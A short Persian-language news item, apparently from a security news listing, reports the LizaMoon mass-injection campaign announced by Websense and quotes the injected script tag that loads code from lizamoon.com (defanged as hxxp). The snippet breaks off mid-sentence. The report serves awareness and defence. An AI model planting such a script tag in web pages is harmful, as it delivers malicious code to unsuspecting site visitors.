حمله

  1. Radars

    mass-injection با نام LizaMoon بیش از یک میلیون URL را آلوده کرد

    لابراتوار امنیتی Websense خرابکاری از نوع mass-injection را که آن را LizaMoon می نامد اعلام کرد. URL اینجکت شده lizamoon.com می باشد و به همین LizaMoon نام گرفت. در این حمله این دستور در صفحه قرار داده می شود: <script src=hxxp://lizamoon.com/ur.php></script> بر اساس جستجوی گوگل تا...
بالا